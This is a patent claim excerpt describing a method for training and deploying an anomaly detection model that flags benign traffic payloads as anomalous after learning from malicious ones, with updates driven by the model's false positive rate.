| CPC H04L 63/1425 (2013.01) [H04L 63/1416 (2013.01)] | 18 Claims |
|
1. A method comprising:
generating a first plurality of feature vectors for unstructured payloads of one or more malicious traffic sessions, wherein generating the first plurality of feature vectors is based, at least in part, on a plurality of malicious features for the unstructured payloads;
training an anomaly detection model on the first plurality of feature vectors to detect malicious unstructured payloads as non-anomalous and benign unstructured payloads as anomalous; and
based, at least in part, on a false positive rate of the trained anomaly detection model satisfying a performance criterion, wherein the false positive rate comprises a rate of false positives in classifications of the trained anomaly detection model on a second plurality of feature vectors,
updating the plurality of malicious features; and
deploying the trained anomaly detection model.
|